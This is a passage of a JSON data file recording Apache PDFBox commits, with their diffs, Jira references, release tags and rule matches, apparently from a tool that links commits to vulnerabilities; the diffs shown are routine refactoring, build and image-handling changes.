b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -85,2 +85,18 @@ public final class LosslessFactory", - " {", - "+ if (pdImageXObject.getBitsPerComponent() < 16 &&", - "+ image.getWidth() * image.getHeight() <= 50 * 50)", - "+ {", - "+ // also create classic compressed image, compare sizes", - "+ PDImageXObject pdImageXObjectClassic = createFromRGBImage(image, document);", - "+ if (pdImageXObjectClassic.getCOSObject().getLength() < ", - "+ pdImageXObject.getCOSObject().getLength())", - "+ {", - "+ pdImageXObject.getCOSObject().close();", - "+ return pdImageXObjectClassic;", - "+ }", - "+ else", - "+ {", - "+ pdImageXObjectClassic.getCOSObject().close();", - "+ }", - "+ }", - " return pdImageXObject;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "c8204dea26835ab4476c9f12513eccb759d071ea" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "5bd0880f4bd783d56ee132cd964f87f97ac1df84", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531330799, - "hunks": 2, - "message": "PDFBOX-4071: update apache parent number git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835650 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 9a1c4816d..86b47b965 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -25,3 +25,3 @@", - " apache", - "- 19", - "+ 20", - " ", - "@@ -51,7 +51,2 @@", - "- ", - "- 2.21.0", - " 1.60" - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "b970999bdf4e8129bfad4c33f0d6c77312d24be9" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "05a82f7c1fa951344576921fd25fb52ae25c9c0f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526745806, - "hunks": 10, - "message": "PDFBOX-3353: simplify code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831906 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index 340de6643..7bff8b71b 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -256,3 +256,4 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "- switch (annotation.getStartPointEndingStyle())", - "+ String startPointEndingStyle = annotation.getStartPointEndingStyle();", - "+ switch (startPointEndingStyle)", - " {", - "@@ -261,3 +262,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " drawArrow(cs, ab.width, y, ab.width * 9);", - "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(annotation.getStartPointEndingStyle()))", - "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(startPointEndingStyle))", - " {", - "@@ -282,3 +283,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " drawArrow(cs, -ab.width, y, -ab.width * 9);", - "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(annotation.getStartPointEndingStyle()))", - "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(startPointEndingStyle))", - " {", - "@@ -297,3 +298,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- if (INTERIOR_COLOR_STYLES.contains(annotation.getStartPointEndingStyle()))", - "+ if (INTERIOR_COLOR_STYLES.contains(startPointEndingStyle))", - " {", - "@@ -301,3 +302,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- else if (!PDAnnotationLine.LE_NONE.equals(annotation.getStartPointEndingStyle()))", - "+ else if (!PDAnnotationLine.LE_NONE.equals(startPointEndingStyle))", - " {", - "@@ -307,3 +308,4 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "- switch (annotation.getEndPointEndingStyle())", - "+ String endPointEndingStyle = annotation.getEndPointEndingStyle();", - "+ switch (endPointEndingStyle)", - " {", - "@@ -312,3 +314,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " drawArrow(cs, lineLength - ab.width, y, -ab.width * 9);", - "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(annotation.getEndPointEndingStyle()))", - "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(endPointEndingStyle))", - " {", - "@@ -333,3 +335,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " drawArrow(cs, lineLength + ab.width, y, ab.width * 9);", - "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(annotation.getEndPointEndingStyle()))", - "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(endPointEndingStyle))", - " {", - "@@ -348,3 +350,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- if (INTERIOR_COLOR_STYLES.contains(annotation.getEndPointEndingStyle()))", - "+ if (INTERIOR_COLOR_STYLES.contains(endPointEndingStyle))", - " {", - "@@ -352,3 +354,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- else if (!PDAnnotationLine.LE_NONE.equals(annotation.getEndPointEndingStyle()))", - "+ else if (!PDAnnotationLine.LE_NONE.equals(endPointEndingStyle))", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "d0d84f7a226ba7deefd6171aab6059986ec242b8" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "bfede6dd7e05614a83ab1595b35511babbbd7b23", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531643421, - "hunks": 1, - "message": "PDFBOX-4071: use correct type cast git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835950 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java", - "index 7bc457830..bb149ce9a 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java", - "@@ -178,3 +178,3 @@ public class COSDictionaryMap implements Map", - " {", - "- COSDictionaryMap other = (COSDictionaryMap)o;", - "+ COSDictionaryMap other = (COSDictionaryMap) o;", - " retval = other.map.equals( this.map );" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/COSDictionaryMap.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "6435f5e24458f174924f75f70e77e710749dd5b0" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "4cf00eb5406739565561ccf28aa74b521f7ca19a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530513744, - "hunks": 17, - "message": "PDFBOX-4184: sonar fix; remove println from test git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834822 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 457d9825b..926fc578f 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -310,5 +310,6 @@ public final class LosslessFactory", - "- // This variable store a row of the image each, the exact type depends", - "+ // These variables store a row of the image each, the exact type depends", - " // on the image encoding. Can be a int[], short[] or byte[]", - "- Object prevRow, transferRow;", - "+ Object prevRow;", - "+ Object transferRow;", - "@@ -458,8 +459,6 @@ public final class LosslessFactory", - "- {", - "- // We swap prev and transfer row, so that we have the prev row for the next row.", - "- Object temp = prevRow;", - "- prevRow = transferRow;", - "- transferRow = temp;", - "- }", - "+ // We swap prev and transfer row, so that we have the prev row for the next row.", - "+ Object temp = prevRow;", - "+ prevRow = transferRow;", - "+ transferRow = temp;", - " }", - "@@ -475,3 +474,3 @@ public final class LosslessFactory", - " int val = transferRow[indexInTranferRow];", - "- byte b0 = (byte) ((val & 0xFF));", - "+ byte b0 = (byte) (val & 0xFF);", - " byte b1 = (byte) ((val >> 8) & 0xFF);", - "@@ -482,3 +481,2 @@ public final class LosslessFactory", - " case BufferedImage.TYPE_INT_BGR:", - "- {", - " targetValues[0] = b0;", - "@@ -487,5 +485,3 @@ public final class LosslessFactory", - " break;", - "- }", - " case BufferedImage.TYPE_INT_ARGB:", - "- {", - " targetValues[0] = b2;", - "@@ -499,3 +495,2 @@ public final class LosslessFactory", - " break;", - "- }", - " case BufferedImage.TYPE_INT_RGB:", - "@@ -521,7 +516,8 @@ public final class LosslessFactory", - " {", - "- for (int i = 0; i < targetValues.length;)", - "+ int itr = indexInTranferRow;", - "+ for (int i = 0; i < targetValues.length; i += 2)", - " {", - "- short val = transferRow[indexInTranferRow++];", - "- targetValues[i++] = (byte) ((val >> 8) & 0xFF);", - "- targetValues[i++] = (byte) (val & 0xFF);", - "+ short val = transferRow[itr++];", - "+ targetValues[i] = (byte) ((val >> 8) & 0xFF);", - "+ targetValues[i + 1] = (byte) (val & 0xFF);", - " }", - "@@ -529,3 +525,3 @@ public final class LosslessFactory", - " {", - "- short alpha = transferRow[indexInTranferRow];", - "+ short alpha = transferRow[itr];", - " alphaImageData[alphaPtr] = (byte) ((alpha >> 8) & 0xFF);", - "@@ -548,4 +544,3 @@ public final class LosslessFactory", - " {", - "- ICC_ColorSpace icc_colorSpace = (ICC_ColorSpace) srcCspace;", - "- ICC_Profile profile = icc_colorSpace.getProfile();", - "+ ICC_Profile profile = ((ICC_ColorSpace) srcCspace).getProfile();", - " // We only encode a color profile if it is not sRGB", - "@@ -647,6 +642,6 @@ public final class LosslessFactory", - " int pc = Math.abs(p - c);", - "- final int Pr;", - "+ final int pr;", - " if (pa <= pb && pa <= pc)", - " {", - "- Pr = a;", - "+ pr = a;", - " }", - "@@ -654,3 +649,3 @@ public final class LosslessFactory", - " {", - "- Pr = b;", - "+ pr = b;", - " }", - "@@ -658,6 +653,6 @@ public final class LosslessFactory", - " {", - "- Pr = c;", - "+ pr = c;", - " }", - "- int r = x - Pr;", - "+ int r = x - pr;", - " return (byte) (r);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "9fbeca0253b32ca8194ed5b5f58cdb6b54429544" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "48baf0dd4571268c69253133aa5e45ce2b55be5e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531332197, - "hunks": 4, - "message": "PDFBOX-4071: add cast / type git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835657 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", - "index 2c6bde09b..e9abf76af 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", - "@@ -61,2 +61,3 @@ import org.bouncycastle.tsp.TSPException;", - " import org.bouncycastle.tsp.TimeStampToken;", - "+import org.bouncycastle.util.Selector;", - " import org.bouncycastle.util.Store;", - "@@ -259,3 +260,4 @@ public final class ShowSignature", - " SignerInformation signerInformation = signers.iterator().next();", - "- Collection matches = certificatesStore.getMatches(signerInformation.getSID());", - "+ Collection matches =", - "+ certificatesStore.getMatches((Selector) signerInformation.getSID());", - " X509CertificateHolder certificateHolder = matches.iterator().next();", - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", - "index 9cf8c06c2..57beb6b3f 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java", - "@@ -52,2 +52,3 @@ import org.bouncycastle.tsp.TSPException;", - " import org.bouncycastle.tsp.TimeStampToken;", - "+import org.bouncycastle.util.Selector;", - " import org.bouncycastle.util.Store;", - "@@ -232,3 +233,3 @@ public class CertInformationCollector", - " Collection matches = certificatesStore", - "- .getMatches(signerInformation.getSID());", - "+ .getMatches((Selector) signerInformation.getSID());" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/signature/ShowSignature.java", - "examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationCollector.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "70ddc21473c07f041579dcf02c94ac8f6cdbd6e6" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "16b31cd9b3a670636b1f0ca808ab0bbf6323c760", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525938700, - "hunks": 1, - "message": "PDFBOX-4218: respect the interpolation setting when scaling masked image git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831313 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java", - "index d26365e4f..8eb76de28 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java", - "@@ -539,6 +539,9 @@ public final class PDImageXObject extends PDXObject implements PDImage", - " Graphics2D g = image2.createGraphics();", - "- g.setRenderingHint(RenderingHints.KEY_INTERPOLATION,", - "- RenderingHints.VALUE_INTERPOLATION_BICUBIC);", - "- g.setRenderingHint(RenderingHints.KEY_RENDERING,", - "- RenderingHints.VALUE_RENDER_QUALITY);", - "+ if (getInterpolate())", - "+ {", - "+ g.setRenderingHint(RenderingHints.KEY_INTERPOLATION,", - "+ RenderingHints.VALUE_INTERPOLATION_BICUBIC);", - "+ g.setRenderingHint(RenderingHints.KEY_RENDERING,", - "+ RenderingHints.VALUE_RENDER_QUALITY);", - "+ }", - " g.drawImage(image, 0, 0, width, height, 0, 0, image.getWidth(), image.getHeight(), null);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/PDImageXObject.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4218": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "2331d0b2bfeb24aa187cd1c005528ae5eeef961e" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4218", - "relevance": 2 - } - ] - }, - { - "commit_id": "97570b0ac9a3d03f6354ba487405c610f4b244a4", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525958777, - "hunks": 1, - "message": "PDFBOX-4071: remove commented out line git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831340 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index e46ee907e..51aaca1b4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -243,4 +243,2 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- //prepareResources(cs);", - "-", - " cs.beginText();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "2c36d4fc667c75c06b136a97cb5c55bdeb7eb2ca", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531499355, - "hunks": 1, - "message": "PDFBOX-4071, PDFBOX-4266: revert 1835649 with comment due to failure to build on jdk6 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1835848 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 85737d43b..584864b57 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -25,3 +25,7 @@", - " apache", - "- 20", - "+", - "+ ", - "+ 19", - "+", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "", - "PDFBOX-4266": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071, PDFBOX-4266", - "relevance": 2 - } - ] - }, - { - "commit_id": "4beb923433249dbd70e6823f9483edfbd9a18559", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528552750, - "hunks": 4, - "message": "PDFBOX-4071: move according to java coding convention git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833238 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "index 0ff1d214d..4b7fbe837 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "@@ -32,35 +32,2 @@ public abstract class BlendMode", - " {", - "- /**", - "- * Determines the blend mode from the BM entry in the COS ExtGState.", - "- *", - "- * @param cosBlendMode name or array", - "- * @return blending mode", - "- */", - "- public static BlendMode getInstance(COSBase cosBlendMode)", - "- {", - "- BlendMode result = null;", - "- if (cosBlendMode instanceof COSName)", - "- {", - "- result = BLEND_MODES.get(cosBlendMode);", - "- }", - "- else if (cosBlendMode instanceof COSArray)", - "- {", - "- COSArray cosBlendModeArray = (COSArray) cosBlendMode;", - "- for (int i = 0; i < cosBlendModeArray.size(); i++)", - "- {", - "- result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", - "- if (result != null)", - "- {", - "- break;", - "- }", - "- }", - "- }", - "-", - "- if (result != null)", - "- {", - "- return result;", - "- }", - "- return BlendMode.NORMAL;", - "- }", - "-", - " public static final SeparableBlendMode NORMAL = new SeparableBlendMode()", - "@@ -242,2 +209,5 @@ public abstract class BlendMode", - "+ // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", - "+ private static final Map BLEND_MODES = createBlendModeMap();", - "+", - " BlendMode()", - "@@ -246,2 +216,35 @@ public abstract class BlendMode", - "+ /**", - "+ * Determines the blend mode from the BM entry in the COS ExtGState.", - "+ *", - "+ * @param cosBlendMode name or array", - "+ * @return blending mode", - "+ */", - "+ public static BlendMode getInstance(COSBase cosBlendMode)", - "+ {", - "+ BlendMode result = null;", - "+ if (cosBlendMode instanceof COSName)", - "+ {", - "+ result = BLEND_MODES.get(cosBlendMode);", - "+ }", - "+ else if (cosBlendMode instanceof COSArray)", - "+ {", - "+ COSArray cosBlendModeArray = (COSArray) cosBlendMode;", - "+ for (int i = 0; i < cosBlendModeArray.size(); i++)", - "+ {", - "+ result = BLEND_MODES.get(cosBlendModeArray.getObject(i));", - "+ if (result != null)", - "+ {", - "+ break;", - "+ }", - "+ }", - "+ }", - "+", - "+ if (result != null)", - "+ {", - "+ return result;", - "+ }", - "+ return BlendMode.NORMAL;", - "+ }", - "+", - " private static int get255Value(float val)", - "@@ -371,5 +374,2 @@ public abstract class BlendMode", - "- // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", - "- private static final Map BLEND_MODES = createBlendModeMap();", - "-", - " private static Map createBlendModeMap()" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "00f7a9acb9c28aafbc68d05e610ac64233ef50d8", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530032450, - "hunks": 0, - "message": "readded accidentically deleted tags git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/1.2.1@1834451 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "a8c51acf4ca61b58473f4cad1b5b15426d97daf1" - ], - [ - "no-tag", - "556ae1aaec681dd883c09079af304d7e30db1f97" - ], - [ - "no-tag", - "618f05e1f4650b4a856cb2341b3c8dc99c363eb9" - ], - [ - "no-tag", - "2d374c65b206469c725b790a9783d389e57d2b7e" - ], - [ - "no-tag", - "df408e9a28d668ea3cbb9f9656cdfc541c437bb4" - ], - [ - "no-tag", - "313e29d56baa1d074519629c9bbcab98bece2fd6" - ], - [ - "no-tag", - "52e12df5c51b0eef320ff731028facf531cf52d2" - ], - [ - "no-tag", - "402d15ba73a4b394efebe3b8703893e0c2f5b409" - ], - [ - "no-tag", - "ba299e77314967a5e5c806bac6b918d95c2147f0" - ], - [ - "no-tag", - "6e177c78b9557ce15f22cc7ba48906c86d30b2e4" - ], - [ - "no-tag", - "a6cb7b07997b0e324708cb73d1b224f8ebe60c0b" - ], - [ - "no-tag", - "1400def5c88140cc9be1245b9b4774a9d558d73c" - ], - [ - "no-tag", - "da541a2ea6c839cddd3ed43ae29110adc60d19d0" - ], - [ - "no-tag", - "1d6c1941f5c2e4097f63b37bcfd906ced5509d12" - ], - [ - "no-tag", - "f98cccc1322157ba704de80aa794290df43abf49" - ], - [ - "no-tag", - "ac9c5c440af820b372f56f53835316ec2b943963" - ], - [ - "no-tag", - "48ba8b28ba8b7743c8608b368b521c1f97abc118" - ], - [ - "no-tag", - "2b8d37ebb43750a82575f0fb3f137739db2ade73" - ], - [ - "no-tag", - "98aa3f2e33aae00b15c6ca6ab56382960cf05a79" - ], - [ - "no-tag", - "2f97caed0dd80b670e6741cec23b903f9ad2223e" - ], - [ - "no-tag", - "a34bb3e5a9ddb35f2cf9003065dbeb38cec7fe85" - ], - [ - "no-tag", - "bc2f3322eaf7ea462f8678939ee60e31c656161e" - ], - [ - "no-tag", - "10252a40fd96a41087e4095f15f2de1bcd81da26" - ], - [ - "no-tag", - "8890ccbf0b3a233578b952748ce090f54c53fea7" - ], - [ - "no-tag", - "be4df58d7197e386fe2ac74c96bcf6a75dbcae03" - ], - [ - "no-tag", - "4983455ee89c1378aa83ff5b49057960f965f5b8" - ], - [ - "no-tag", - "cc7eeb2147fa787468542bc8a577fe35c19c0473" - ], - [ - "no-tag", - "2a29f8e55653f54dc46ea9eddacbb5a52f523964" - ], - [ - "no-tag", - "c7ff0971ae53162d39b85f1ef8d35b3c31a056bb" - ], - [ - "no-tag", - "58c362bee6662e251bde0da9b8a33e8f247ba0f4" - ], - [ - "no-tag", - "6d478f0e228563ad5a713b035767a59e0e8f85ff" - ], - [ - "no-tag", - "9b2e8e73b853d38490de98041627a3f9b075eb96" - ], - [ - "no-tag", - "dd6292ed5dbe50457885a0fbf657777f9ca5ec88" - ], - [ - "no-tag", - "7a997954b5f67d30aa00371bc6465d33744fa3eb" - ], - [ - "no-tag", - "0d5e1235f7eaf70afa55eda1cec6a9db381c94ea" - ], - [ - "no-tag", - "0cedd70a1bfc07e0e2bfbcdccf53f01cef27b0de" - ], - [ - "no-tag", - 